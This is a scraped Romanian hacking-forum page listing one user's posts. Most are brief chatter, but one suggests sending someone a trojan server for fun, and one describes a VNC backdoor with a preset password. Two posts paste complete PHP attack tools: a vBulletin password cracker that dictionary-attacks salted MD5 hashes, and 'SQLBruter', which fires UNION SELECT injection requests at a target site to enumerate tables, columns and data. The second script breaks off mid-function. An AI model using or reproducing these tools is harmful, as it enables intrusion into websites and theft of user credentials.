Ras
-
Posts
1106 -
Joined
-
Last visited
-
Days Won
1
Posts posted by Ras
-
-
din cate stiu eu... toate telefoanele care au simbian (sau symbian... nu stiu cum se scrie) pot lua virusi.
-
Nici la mine nu merge :cry:
-
flame scrie pe voi...
lasa-ti omu in pace... e problema lui daca pune posturi aiurea... poate nu stie mai multe... sau sunteti voi mai destepti.
-
goog job slick!
zicea si vladiii ceva in legatura cu Yahoo Messenger remote BOF.
ma bag sa incerc programul tau
-
La multi ani celor care purtati numele de Alexandru / Alexandra[nu cred ca sunt fete p'aici]
Puteti sa imi ziceti si mie la multi ani pt ca ma cheama Alexandru
-
eu numesc accesta metoda vurnabilitatea userilor.
Deci ma lasa fara cuvinte . Omu asta este fenomenal am putea face un site rst-fun si am avea la vizitatori cu tut lui lexx de depasim softpedia =)
Are si echipa de hacking :
E.M.I.N.E.M Mortal Team
Lepoon da-mi si mie id-ul tau pe privat... ca sa nu ne certam aici.
Daca vrei sa stii Mortal Team este un team mic si nici nu vreau sa fie mare... este site-ul meu si al lui eminem...
Am avut echipa aia mica si pe dc++ acum ceva ani buni... cand tu nu cred ca aveai vreo treaba cu calculatorul...
Oricum eu tac... da-mi un pm cu id tau si vorbim dupaia... pt ca nu vreau sa iau avertisment aici.
-
-
titlurile si culoarea si a adaugat ceva frumos jos
EDIT
spiry, cred ca e c99 ala de ieri, nu?
-
welcome!
vezi mesaj pe privat.
-
-
incearca si trimite-i un server de trojan care sa nu ii afecteze systemul...
si distreaza-te cu el..
-
############################################################
## Author: M4k3 ##
## Script-Version: 1.0.2b ##
## Script-Name: vb_tool.php ##
## Copyright: pldsecurity.de / .com /pldsoft.com ##
## ##
## Comment: Next Version coming soon, check ##
## pldsecurity.com for Updates ##
############################################################
# For Crack Option, you need: [vbulletin database] & [wordlist]
# For Find Option, you need: [vbulletin database]
###################### Set Error Reporting #################
error_reporting(E_ALL & ~E_NOTICE);
set_time_limit(60);
# 60 for a database with 1000 Users
# 180 for a database with 3000 Users
####################### Change Values ######################
#MySQL Values
$mysql[server] = 'localhost:3306';
$mysql[username] = 'root';
$mysql[password] = '';
$mysql[database] = 'vbulletin';
$mysql[table] = 'user';
$mysql[/page][page] = '20'; # Show 20 User / Site on User list
#Script Values
$script[wordlist] = 'word.txt';
if(!file_exists($script[wordlist])) {
$script[crack_option] = false;
}
$script[version] = '1.0.2b';
#############################################################
###################### Connection ###########################
$mysql[connect] = mysql_connect($mysql[server], $mysql[username], $mysql[password])
or die ("MySQL-Error: " .mysql_error());
$mysql[connect_db] = mysql_select_db($mysql[database], $mysql[connect])
or die ("MySQL-Error: " . mysql_error());
#############################################################
function check_table() {
global $mysql;
$query = mysql_query("Select * from ".$mysql[table]."")
or die ("MySQL-Error: " . mysql_error());
if(!mysql_error()) {
return 1;
}
}
function find_password($_POST) {
global $mysql;
$query = mysql_query("Select * from ".$mysql[table]."")
or die ("MySQL-Error: " . mysql_error());
while($user = mysql_fetch_array($query)) {
$script[get_salt] .= $user[salt].htmlentities('<r>');
}
$script[salt] = explode(htmlentities('<r>'), $script[get_salt]);
$query = mysql_query("Select * from ".$mysql[table]."")
or die ("MySQL-Error: " . mysql_error());
while($user = mysql_fetch_array($query)) {
for($i=0;$i<=sizeof($script[salt]);$i++) {
if(md5(md5(rtrim($_POST['password'])).$script[salt][$i]) == $user[password]) {
print 'Password found! Username: '.$user[username].' Userid: '.$user[userid].'
';
flush();
}
}
}
}
function crack_password($_POST) {
global $script;
global $mysql;
$query = mysql_query("Select * from ".$mysql[table]." where username = '".addslashes($_POST['username'])."'")
or die ("MySQL-Error: " . mysql_error());
$user = mysql_fetch_array($query);
if(!is_array($user)) {
print 'The User with the name [b]'.addslashes($_POST['username']).'[/b] doesn\'t exist.
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on">Back to Index</a>';
} else {
$file = fopen($script[wordlist], 'r');
while(!feof($file)) {
$word = fgets($file, 4096);
if(md5(md5(rtrim($word)).$user[salt]) == $user[password]) {
print 'Password Cracked! Password is [b]'.$word.'[/b]';
$cracked = true;
}
}
if($cracked == false) {
print 'Failed to Crack Password.';
}
fclose($file);
}
}
if(check_table() == 1) {
print '<html>
<head>
<title>VBulletin Password Cracker</title>
<style type = "text/css">
body {
font-size: 11px;
text-align: center;
}
.option_table {
font-size: 11px;
border: 1px #000000 solid;
width: 300px;
}
.main_table {
font-size: 11px;
border: 1px #000000 solid;
width: 350px;
}
.user_table {
font-size: 11px;
text-align: center;
border: 0px #000000 solid;
}
.show_user {
border: 1px #000000 solid;
width: 125px;
}
.input_text {
font-size: 11px;
}
.input_submit {
color: #ffffff;
font-size: 11px;
border: 1px #000000 solid;
background-color: #000000;
}
a:link {
color: #000000;
text-decoration: none;
}
a:hover {
color: #000000;
text-decoration: underline overline;
}
</style>
</head>
<body>';
if(empty($_GET['crack_option']) && empty($_GET['find_option'])) {
print '<form method = "get">
<table border = "0" cellspacing = "0" cellpadding = "5" align = "center" class = "option_table">
<tr>
<td colspan = "2" align = "center">
[b]vbulletin password cracker & finder '.$script[version].'[/b]
<hr size = "1" style = "border: 1px #000000 solid;"
</td>
</tr>
<tr>
<td>';
if($script[crack_option] !== false) {
print '<input type = "checkbox" name = "crack_option">';
} else {
print '<input type = "checkbox" name = "crack_option" disabled>';
}
print '</td>
<td>
Use "Crack Password" Option
</td>
</tr>
<tr>
<td>
<input type = "checkbox" name = "find_option">
</td>
<td>
Use "Find Password" Option
</td>
</tr>
<tr>
<td colspan = "2" align = "center">
<hr size = "1" style = "border: 1px #000000 solid;"
<input type = "submit" value = "Run Option" class = "input_submit">
</td>
</tr>
<tr>
<td colspan = "2" align = "center">
© Copyright by M4k3 <a href = "http://pldsecurity.com">PLDsecurity.com</a>
</td>
</tr>
</table>
</form>';
}
if($_GET['crack_option'] == 'on') {
if($_GET['do'] == 'show_user') {
print '<table border = "0" cellspacing = "0" cellpadding = "5" align = "center" class = "user_table">
<tr>
<td colspan = "2" class = "show_user">
Please select a username.
</td>
</tr>
<tr>
<td class = "show_user">
Userid
</td>
<td class = "show_user">
Username
</td>
</tr>';
if(empty($_GET['start']) && empty($_GET['end'])) {
$query = mysql_query("Select userid, username from ".$mysql[table]." limit 0, ".$mysql[/page][page]."")
or die ("MySQL-Error: " . mysql_error());
while($show_user = mysql_fetch_array($query)) {
print '<tr>
<td class = "show_user">
'.$show_user[userid].'
</td>
<td class = "show_user">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=get_user&username='.$show_user[username].'">
'.$show_user[username].'</a>
</td>
</tr>';
}
print '<tr>
<td colspan = "2" align = "right" class = "show_user">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$mysql[/page][page].'&end='.$mysql[/page][page].'">
Next Page >></a>
</td>
</tr>
</table>
';
print '<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on">Back to Index</a>';
} else {
$query = mysql_query("Select userid, username from ".$mysql[table]." limit
".addslashes($_GET['start']).",".addslashes($_GET['end'])."")
or die ("MySQL-Error: " . mysql_error());
while($show_user = mysql_fetch_array($query)) {
print '<tr>
<td class = "show_user">
'.$show_user[userid].'
</td>
<td class = "show_user">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=get_user&username='.$show_user[username].'">
'.$show_user[username].'</a>
</td>
</tr>';
}
$page[next] = $_GET['start'] + $mysql[/page][page];
$page[previous] = $_GET['start'] - $mysql[/page][page];
$query = mysql_query("Select count(*) from user")
or die ("MySQL-Error: " . mysql_error());
$mysql[table_count] = mysql_fetch_array($query);
if($page[previous] < 0) {
print '<tr>
<td colspan = "2" align = "right" class = "show_user">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[next].'&end='.$mysql[/page][page].'">
Next Page >></a>
</td>
</tr>
</table>
';
} elseif($page[next] > $mysql[table_count][0]) {
print '<tr>
<td colspan = "2" align = "left" class = "show_user">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[previous].'&end='.$mysql[/page][page].'">
<< Previous Page</a>
</td>
</tr>
</table>
';
} else {
print '<tr>
<td align = "left" class = "show_user">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[previous].'&end='.$mysql[/page][page].'">
<< Previous Page</a>
</td>
<td align = "right" class = "show_user">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user&start='.$page[next].'&end='.$mysql[/page][page].'">
Next Page >></a>
</td>
</tr>
</table>
';
}
print '<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on">Back to Index</a>';
}
} elseif($_GET['do'] == 'crack_password' && !empty($_POST['username'])) {
crack_password($_POST);
} else {
print '<form action = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=crack_password" method = "post">
<table border = "0" cellspacing = "0" cellpadding = "5" align = "center" class = "main_table">
<tr>
<td colspan = "2" align = "center">
Insert a username or use the function "show user list"
<hr size = "1" style = "border: 1px #000000 solid;">
</td>
</tr>
<tr>
<td>
Username:
</td>
<td>';
if($_GET['do'] == 'get_user' && !empty($_GET['username'])) {
print '<input type = "text" name = "username" value = "'.$_GET['username'].'" size = "30"
class = "input_text">';
} else {
print '<input type = "text" name = "username" size = "30" class = "input_text">';
}
print '</td>
</tr>
<tr>
<td colspan = "2" align = "center">
<input type = "submit" value = "Crack Password" class = "input_submit">
</td>
</tr>
<tr>
<td colspan = "2" align = "center">
<hr size = "1" style = "border: 1px #000000 solid;">
<a href = "'.$_SERVER[PHP_SELF].'?crack_option=on&do=show_user">show user list</a>
</td>
</tr>
</table>
</form>
<a href = "'.$_SERVER[PHP_SELF].'">Back to Script Index</a>';
}
} elseif($_GET['find_option'] == 'on') {
if($_GET['do'] == 'find_password' && !empty($_POST['password'])) {
print 'Searching...
';
flush();
find_password($_POST);
} else {
print '<form action = "'.$_SERVER[PHP_SELF].'?find_option=on&do=find_password" method = "post">
<table border = "0" cellspacing = "0" cellpadding = "5" align = "center" class = "main_table">
<tr>
<td colspan = "2" align = "center">
Please insert a password.
<hr size = "1" style = "border: 1px #000000 solid;">
</td>
</tr>
<tr>
<td>
Password:
</td>
<td>
<input type = "text" name = "password" size = "30" class = "input_text">
</td>
</tr>
<tr>
<td colspan = "2" align = "center">
<input type = "submit" value = "Find Password" class = "input_submit">
</td>
</tr>
</table>
</form>
<a href = "'.$_SERVER[PHP_SELF].'">Back to Script Index</a>';
}
}
print '
</body>
</html>';
}
?><?
# For Crack Option, you need: [vbulletin database] & [wordlist]
# For Find Option, you need: [vbulletin database]
-
Computerul tinta are nevoie de urmatoarele fisiere: omnithread_rt.dll , VNCHooks.dll , WinVNC.exe, precum si sa importe VNC_secret.reg in registri ceea ce va crea acces cu parola: secret
Nu prea seamana a backdoor
Este o metoda fainuta daca poti face pe cineva sa instaleze si sa execute acel fisier. Altfel daca ai acces la computerul unde vrei sa ai remote control nu ai nevoie sa importezi VNC_secret.reg ...iti pui ce parola vrei tu
Merci pt explicatie
-
<?
###############################################
# SQLBruter v1.2 #
# (c)oded by Raz0r #
# ICQ 502210 #
# Greets to InAttack #
###############################################
error_reporting(7);
set_magic_quotes_runtime(0);
@set_time_limit(0);
@ini_set("max_execution_time",0);
@ini_set("output_buffering",0);
@ini_set("default_socket_timeout",5);
if (function_exists("ob_start")) ob_start('ob_tidyhandler');
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\';
$self=basename($HTTP_SERVER_VARS['PHP_SELF']);
echo "<html>
<head><title>::SQLBruter 1.2 (coded by Raz0r)::</title>
<style>
Body {
; Font-Family: Arial;
; Font-size: 14px;
}
INPUT.speed {
; Font-Family: Arial;
; Font-size: 14px;
; Border-style: none;
; BackGround-color: transparent;
}
TABLE {
; Font-Family: Arial;
; Font-size: 14px;
}
TD.strconv {
; Font-Family: Verdana;
; Font-size: 4px;
}
DIV.copyright {
; Font-Family: Arial;
; Font-size: 12px;
; color: SILVER;
}
</style>
</head>";
if ((!isset($_POST['submit'])) && (!isset($_GET['encode'])))
{
die ("
<body onLoad=\"document.getElementById('1').style.display = 'none'; document.getElementById('2').style.display = 'none'; document.getElementById('3').style.display = 'none'; document.getElementById('4').style.display = 'none';\">
<Font Face=\"arial\">
<Center>
<H1><Font color=#DDDDDD>SQLBruter 1.2</font></H1>
<Form Method=\"Post\">
<Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD>
<Tr>
<Td>
<Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef>
<Tr>
<Td>
<table><tr><td width=100>URL</td> <td><Input Type=\"text\" Name=\"url_post\" Value=\"http://\" SIZE=40></td></table>
<table><tr><td width=100>String</td> <td><Input Type=\"text\" Name=\"string_post\" SIZE=40></td></table>
<table><tr><td width=100>log file</td> <td><Input Type=\"text\" Name=\"log_post\" Value=\"log.txt\" SIZE=40></td></table>
<table><tr><td width=100>proxy</td><td><Input Type=\"text\" Name=\"proxy_post\" SIZE=40></td></table>
<table><tr><td valign=top width=100>mode</td><td>
<Input Type=\"radio\" Name=\"mode_post\" Value=\"1\" onClick=\"document.getElementById('1').style.display = 'block'; document.getElementById('2').style.display = 'none'; document.getElementById('3').style.display = 'none'; document.getElementById('4').style.display = 'none';\">Number of selected rows bruteforce
<Input Type=\"radio\" Name=\"mode_post\" Value=\"2\" onClick=\"document.getElementById('1').style.display = 'none'; document.getElementById('2').style.display = 'block'; document.getElementById('3').style.display = 'none'; document.getElementById('4').style.display = 'none';\">Names of tables bruteforce
<Input Type=\"radio\" Name=\"mode_post\" Value=\"3\" onClick=\"document.getElementById('1').style.display = 'none'; document.getElementById('2').style.display = 'none'; document.getElementById('3').style.display = 'block'; document.getElementById('4').style.display = 'none';\">Names of columns bruteforce
<Input Type=\"radio\" Name=\"mode_post\" Value=\"4\" onClick=\"document.getElementById('1').style.display = 'none'; document.getElementById('2').style.display = 'none'; document.getElementById('3').style.display = 'none'; document.getElementById('4').style.display = 'block';\">Character-oriented bruteforce</td></table>
<div id=\"1\"><table><tr><td width=200>max number of rows to brute</td> <td valign=top>
<Input Type=\"text\" Name=\"max_post\" Value=\"20\" SIZE=2></td></table>
<table><tr><td width=200>get columns which can output information</td> <td valign=top>
<Input Type=\"checkbox\" Name=\"getcols_post\" checked></td></table></div>
<div id=\"2\"><table><tr><td width=200>number of the selected rows</td> <td valign=top>
<Input Type=\"text\" Name=\"rows1_post\" Value=\"15\" SIZE=2></td></table><table><tr><td width=200>path to the dictionary file</td><td>
<Input Type=\"text\" Name=\"dic1_post\" Value=\"dic.txt\" SIZE=20></td></tr><table><tr><td width=200>prefix</td><td>
<Input Type=\"text\" Name=\"pref_post\" SIZE=20></td></tr></table></div>
<div id=\"3\"><table><tr><td width=200>number of the selected rows</td> <td valign=top>
<Input Type=\"text\" Name=\"rows2_post\" Value=\"15\" SIZE=2></td></table><table><tr><td width=200>path to the dictionary file</td><td>
<Input Type=\"text\" Name=\"dic2_post\" Value=\"dic.txt\" SIZE=20></td></tr><table><tr><td width=200>name of the table to brute</td><td>
<Input Type=\"text\" Name=\"table_post\" SIZE=20></td></tr></table></div>
<div id=\"4\"><table title=\"e.g. user(), version(), etc\"><tr><td width=200>DB query</td> <td valign=top>
<Input Type=\"text\" Name=\"query_post\" Value=\"user()\" SIZE=20></td></table><table><tr><td width=200>use specific range of chars</td><td>
<Input Type=\"text\" Name=\"ot_post\" Value=\"97\" SIZE=3><Input Type=\"text\" Name=\"do_post\" Value=\"122\" SIZE=3></td></tr></table></div>
</Td>
</Tr>
</Table>
</Td>
</Tr>
</Table>
<A Href=\"$self?encode\">String converter</A>
<Input Type=\"submit\" Value=\"GO!\" name=\"submit\">
<Div class=copyright>[B]Raz0r[/B] 2007 ©</Div></Center>
</body>
</html>"
);
}
elseif (isset($_GET['encode']))
{
$strconv = $_POST['strconv_post'];
$len = strlen($strconv);
echo "<body>
<Center>
<H1><Font color=#DDDDDD>SQLBruter 1.2</font></H1>
<Form Method=\"Post\">
<Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=90%>
<Tr>
<Td>
<Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%>
<Tr>
<Td>
<table><tr><td width=100%>
<Input Type=\"text\" Name=\"strconv_post\" Value=\"";if (!empty($strconv))echo $strconv; else echo "enter text here"; echo "\">
<Input Type=\"submit\" name=\"submit_encode\" Value=\"Encode\">
</td></tr></table>";
for ($i = 0; $i < $len; $i++)
{
$substring = substr($strconv,$i,1);
$ascii_code = ord($substring);
if ($i == ($len - 1)) $res .= $ascii_code;
else $res .= $ascii_code.",";
}
if (($len > 0) && (isset($_POST['submit_encode']))) $ascii = "CHAR(".$res.")"; else $ascii = null;
if (($len > 0) && (isset($_POST['submit_encode']))) $hex = "0x".bin2hex($strconv); else $hex = null;
if(isset($_POST['submit_encode'])) $base64 = base64_encode($strconv);
if(isset($_POST['submit_encode']))$md5= md5($strconv);
if(isset($_POST['submit_encode']))$sha1 = sha1($strconv);
echo "<Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=90%>
<Tr>
<Td>
<Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%>
<Tr><Td>
<table><tr><td width=200>ASCII (SQL syntax)</td> <td><TextArea Name=result1 Cols=\"100\" Rows=\"2\">$ascii</TextArea></td><Td><input type=button name=Button value=\"Highlight\" onClick=result1.select();result1.focus()></Td></table>
<table><tr><td width=200>HEX</td> <td><TextArea Name=result2 Cols=\"100\" Rows=\"2\">$hex</TextArea></td><Td><input type=button name=Button value=\"Highlight\" onClick=result2.select();result2.focus()></Td></table>
<table><tr><td width=200>BASE64</td> <td><TextArea Name=result3 Cols=\"100\" Rows=\"2\">$base64</TextArea></td><Td><input type=button name=Button value=\"Highlight\" onClick=result3.select();result3.focus()></Td></table>
<table><tr><td width=200>MD5</td> <td><TextArea Name=result4 Cols=\"100\" Rows=\"2\">$md5</TextArea></td><Td><input type=button name=Button value=\"Highlight\" onClick=result4.select();result4.focus()></Td></table>
<table><tr><td width=200>SHA1</td> <td><TextArea Name=result5 Cols=\"100\" Rows=\"2\">$sha1</TextArea></td><Td><input type=button name=Button value=\"Highlight\" onClick=result5.select();result5.focus()></Td></table>
</Td>
</Td>
</Tr>
</Table>
</Td>
</Tr>
</Table></Td>
</Tr>
</Table></Td>
</Tr>
</Table><Div class=copyright>
[B]Raz0r[/B] 2007 ©</Div></Center></body></html>";
die;
}
if (!empty($_POST['url_post'])) $url = $_POST['url_post']; else die("NO URL");
if (!empty($_POST['string_post'])) $string = $_POST['string_post']; else die("NO STRING");
if (!empty($_POST['mode_post'])) $mode = $_POST['mode_post']; else die("NO MODE");
if (!empty($_POST['log_post'])) $log = $_POST['log_post'];
if (!empty($_POST['proxy_post']))$proxy = $_POST['proxy_post'];
$c = preg_match($proxy_regex,$proxy);
if (!$c) die("NOT A VALID PROXY");
$conn = @parse_url($url);
$host = $conn["host"];
$path = $conn["path"];
$param = $conn["query"];
if (isset($conn["port"])) $port = $conn["port"]; else $port=80;
switch ($mode)
{
case 1:
if (!empty($_POST['max_post'])) $max = $_POST['max_post']; else die("NO MAX NUMBER OF ROWS");
if (!empty($_POST['getcols_post'])) $getcols = $_POST['getcols_post'];
if ($getcols == "on") $getcols = 1; else $getcols = 0;
show_params();
mode1($url, $string, $max, $getcols);
break;
case 2:
if (!empty($_POST['rows1_post'])) $rows = $_POST['rows1_post']; else die("NO ROWS");
if (!empty($_POST['dic1_post'])) $dic = $_POST['dic1_post']; else die("NO DICTIONARY");
if (!empty($_POST['pref_post'])) $pref = $_POST['pref_post'];
show_params();
brute($url, $string, $rows, $dic, FALSE);
break;
case 3:
if (!empty($_POST['rows2_post'])) $rows = $_POST['rows2_post']; else die("NO ROWS");
if (!empty($_POST['dic2_post'])) $dic = $_POST['dic2_post']; else die("NO DICTIONARY");
if (!empty($_POST['table_post'])) $table = $_POST['table_post']; else die("NO TABLE");
show_params();
brute($url, $string, $rows, $dic, $table);
break;
case 4:
if (!empty($_POST['query_post'])) $query = $_POST['query_post']; else die("NO QUERY");
if (!empty($_POST['ot_post'])) $ot = $_POST['ot_post']; else $ot = 97;
if (!empty($_POST['do_post'])) $do = $_POST['do_post']; else $do = 122;
show_params();
mode4($url, $string, $query, $ot, $do);
break;
}
function mode_name($mode)
{
$modes = array("Number of selected rows bruteforce", "Names of tables bruteforce", "Names of columns bruteforce", "Character-oriented bruteforce");
return $modes[$mode-1];
}
function show_params()
{
global $url, $string, $mode, $log, $proxy, $max, $rows, $dic, $pref, $table, $query, $ot, $do;
$mode_name = mode_name($mode);
echo "
<body>
<script>
<!--
var ie=document.all?1:0;
var ns=document.getElementById&&!document.all?1:0;
function InsertText(text)
{
if(ie)
{
document.all.text.value=text;
}
else if(ns)
{
document.forms['speed'].elements['text'].value=text;
}
else
alert(\"Your browser is NOT supported\");
}
-->
</script>
<Font Face=\"arial\">
<Center>
<H1><Font color=#DDDDDD>SQLBruter 1.2</font></H1>
<Table CellSpacing=\"0\" CellPadding=\"0\" width=90%>
<Tr>
<Td>
<Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=100%>
<Tr>
<Td>
<Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%>
<Tr>
<Td>
<table><tr><td width=150>[B]URL[/B]</td> <td>".htmlspecialchars($url)."</td></table>
<table><tr><td width=150>[B]String[/B]</td> <td>".htmlspecialchars($string)."</td></table>
<table><tr><td width=150>[B]Mode[/B]</td><td>".htmlspecialchars($mode_name)."</td></table>
";
if (isset($log)) echo "<table><tr><td width=150>[B]Log file[/B]</td> <td>".htmlspecialchars($log)."</td></table>";
if (isset($proxy)) echo "<table><tr><td width=150>[B]Proxy[/B]</td> <td>".htmlspecialchars($proxy)."</td></table>";
switch ($mode)
{
case 1:
echo "<table><tr><td width=150>[B]Rows max number[/B]</td> <td>".htmlspecialchars($max)."</td></table>";
break;
case 2:
echo "<table><tr><td width=150>[B]Number of the selected rows[/B]</td> <td>".htmlspecialchars($rows)."</td></table>";
echo "<table><tr><td width=150>[B]Dictionary[/B]</td> <td>".htmlspecialchars($dic)." (".checkdic($dic)." words)</td></table>";
if (isset($pref)) echo "<table><tr><td width=150>[B]Prefix[/B]</td> <td>".htmlspecialchars($pref)."</td></table>";
break;
case 3:
echo "<table><tr><td width=150>[B]Number of the selected rows[/B]</td> <td>".htmlspecialchars($rows)."</td></table>";
echo "<table><tr><td width=150>[B]Dictionary[/B]</td> <td>".htmlspecialchars($dic)." (".checkdic($dic)." words)</td></table>";
echo "<table><tr><td width=150>[B]Table[/B]</td> <td>".htmlspecialchars($table)."</td></table>";
break;
case 4:
echo "<table><tr><td width=150>[B]Query[/B]</td> <td>".htmlspecialchars($query)."</td></table>";
echo "<table><tr><td width=150>[B]From[/B]</td> <td>".htmlspecialchars($ot)."</td></table>";
echo "<table><tr><td width=150>[B]To[/B]</td> <td>".htmlspecialchars($do)."</td></table>";
break;
}
echo "</Td></Tr></Table></Td></Tr></Table>
";
flush();
}
function sendpacket($packet)
{
global $host, $port, $proxy;
if (empty($proxy))
{
$ock = @fsockopen(@gethostbyname($host),$port);
stream_set_blocking($ock, 0);
stream_set_timeout($ock,600);
if (!$ock)
{
echo "No response from ".$host.":80
";
}
else
{
fputs($ock, $packet);
$html="";
while (!feof($ock))
{
$html.=fgets($ock);
}
}
}
else
{
$parts=explode(":",$proxy);
$ock2=@fsockopen($parts[0],$parts[1]);
if (!$ock2)
{
echo "No response from proxy ($proxy)";
}
else
{
fputs($ock2,$packet);
$html="";
while ((!feof($ock2)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html)))
{
$html.=fread($ock2,1);
}
}
}
return $html;
}
function savelogfile($logfile, $mode, $text)
{
if (!is_file($logfile))
{
$s = @fopen($logfile,"w");
fclose($s);
chmod($logfile,0777);
}
$fp = @fopen($logfile,"a");
fputs($fp, "*** SQLBruter's report [".date(" l dS 0f F Y h:i:s A ")."] ***\r\n");
fputs($fp, "[~] ".mode_name($mode)."\r\n".$text."\r\n");
fputs($fp, "____________________________________________________________________\r\n");
fclose($fp);
}
function checkdic($dic)
{
$handle = @fopen($dic, "r");
if ($handle)
{
while (!feof($handle))
{
$buffer = fgets($handle, 4096);
$x++;
}
fclose($handle);
}
else die("INVALID DICTIONARY");
return $x;
}
function mode1($url, $string, $max, $getcols)
{
global $log, $proxy, $host, $path, $param;
echo "<Form name=\"speed\"><Input Type=\"text\" Name=\"text\" Value=\"Please wait...\" size=100 class=speed DISABLED=yes></Form>"; flush();
for ($i = 0; $i < $max; $i++)
{
if ($i > 0) $null .=",0"; else $null = "0";
$packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$null."/* HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "Connection: Close\r\n\r\n";
$content = sendpacket($packet);
if (strpos($content, $string)>0)
{
if ($getcols == 1)
{
for ($z = 1; $z <= ($i+1); $z++)
{
if ($z > 1) $razor .=",0x72617a3072".bin2hex($z);
else $razor = "0x72617a3072".bin2hex($z);
}
$temp = explode("=", $param);
$temp[(sizeof($temp)-1)] = "-1";
$param = implode("=", $temp);
$packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$razor."/* HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "Connection: Close\r\n\r\n";
$content = sendpacket($packet);
for ($y = 1; $y <= ($i+1); $y++)
{
if (strpos($content, ("raz0r".$y)) > 0) $visiblecols[] .= $y;
}
if (!is_array($visiblecols)) {$nocols = 1;}
}
echo "<script>InsertText('Done!');</script>";
echo "<Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=100%><Tr><Td><Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%><Tr><Td>Number of rows is ".($i+1)."
";
if (($getcols == 1) && ($nocols != 1)) {$result = $url." UNION SELECT ".$null."/*
Columns ".@implode(",", $visiblecols)." can output information";}
elseif ($nocols == 1) $result = $url." UNION SELECT ".$null."/*
No columns which can output information";
else $result = $url." UNION SELECT ".$null."/*";
echo $result;
echo "</Td></Tr></Table></Td></Tr></Table></Td></Tr></Table></body></html>";
flush();
if (isset($log)) {$result = str_replace("
", "\r\n", $result); savelogfile($log, 1, $result);}
die;
}
}
echo "<script>InsertText('Failed! Try to increase max number of selected rows');</script>"; flush();
}
function brute($url, $string, $rows, $dic, $table)
{
global $log, $proxy, $pref, $host, $path, $param;
$x = checkdic($dic);
echo "<Form name=\"speed\"><Input Type=\"text\" Name=\"text\" Value=\"\" size=100 class=speed DISABLED=yes></Form>";
flush();
$handle = @fopen($dic, "r");
if ($handle)
{
$begin_time = time();
if ($table === FALSE)
{
for ($i = 0; $i < $rows; $i++)
{
if ($i > 0) $null .=",0";
else $null = "0";
}
}
else
{
for ($i = 0; $i < ($rows-1); $i++)
{
if ($i > 0) $null .=",0";
else $null = "0";
}
}
for ($i = 0; $i < $x; $i++)
{
$word = fgets($handle, 4096);
$word = ereg_replace("\n", "", $word);
$word = ereg_replace("\r", "", $word);
$word = trim($word);
if (isset($pref)) $word = $pref."_".$word;
if (($word !== "") & (!is_numeric($word)) & (!strpos($word,"-")) & (!strpos($word, " ")))
{
if ($table === FALSE) $packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$null."%20FROM%20".urlencode($word)."/* HTTP/1.1\r\n";
else $packet = "GET ".$path."?".$param."%20UNION%20SELECT%20".$null.",".urlencode($word)."%20FROM%20".$table."/* HTTP/1.1\r\n";
$packet .= "Host: ".$host."\r\n";
$packet .= "Connection: Close\r\n\r\n";
$content = sendpacket($packet);
$z++;
$r++;
if ($begin_time + 1 == time())
{
$begin_time += 1;
$percent = round($z/$x * 100);
$words_per_second = $r;
$r = 0;
echo "<script>InsertText('Completed - ".$percent."%\tCurrent speed - ".$words_per_second." words per second');</script>";
flush();
}
elseif ($begin_time + 1 < time())
{
$begin_time = time() + 1;
$percent = round($z/$x * 100);
$words_per_second = $r;
$r = 0;
echo "<script>InsertText('Completed - ".$percent."%\tCurrent speed - ".$words_per_second." words per second');</script>";
flush();
}
if (strpos($content, $string)>0)
{
if ($table === FALSE)
{
$result = $url." UNION SELECT ".$null." FROM ".$word."/*";
echo "<Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=100%><Tr><Td><Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%><Tr><Td>Table was found - $word
$result</Td></Tr></Table></Td></Tr></Table>
";
}
else
{
$result = $url." UNION SELECT ".$null.",".$word." FROM ".$table."/*";
echo "<Table CellSpacing=\"0\" CellPadding=\"1\" bgcolor=#DDDDDD width=100%><Tr><Td><Table CellSpacing=\"0\" CellPadding=\"3\" bgcolor=#efefef width=100%><Tr><Td>Column was found - $word
$result</Td></Tr></Table></Td></Tr></Table>
";
}
flush();
if (isset($log))
{
if ($table === FALSE) savelogfile($log, 2, $result);
else savelogfile($log, 3, $result);
}
}
}
}
}
}
function found($min, $max, $sp, $result)
{
if (($max-$min)<5) crack($min,$max, $sp, $result);
$r = round($max - ($max-$min)/2);
$check = ">$r";
if ( check($check, $sp, $result))
{
if (!empty($result)) $status = "(".$result.")";
print "<script>InsertText('Now checking > $r $status');</script>";
flush();
found($r,$max, $sp, $result);
}
else
{
if (!empty($result)) $status = "(".$result.")";
print "<script>InsertText('Now checking < $r $status');</script>";
flush();
found($min,$r+1, $sp, $result);
}
}
function crack($cmin, $cmax, $sp, $result)
{
global $ot, $do, $output, $query;
$i = $cmin;
$check1 = ">0";
if (check($check1, $sp, $result))
{
